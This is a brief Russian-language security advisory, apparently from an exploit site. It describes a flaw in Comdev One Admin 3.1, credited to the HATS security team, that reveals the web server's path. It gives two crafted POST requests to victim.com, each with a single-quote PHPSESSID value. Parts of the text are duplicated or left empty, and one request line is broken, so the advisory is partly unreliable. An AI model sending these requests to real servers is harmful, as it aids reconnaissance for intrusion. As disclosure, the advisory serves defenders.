Обратный путь в каталогах в Comdev One Admin 3.1
Пример/эксплоит:
Возможно получение реального пути к веб-серверу с помощью запроса:
1.
2.
Источник: HATS security team
Пример/эксплоит:
Возможно получение реального пути к веб-серверу с помощью запроса:
1.
Код:
http://victim.com/index.php
POST PHPSESSID='&pageaction=1&username=1&password=1 HTTP/1.12.
Код:
http://victim.com/index.php?component=common&page=wce.forget.php
POST PHPSESSID='&pageaction=1&username=1&email=test@test.ru HTTP/1.1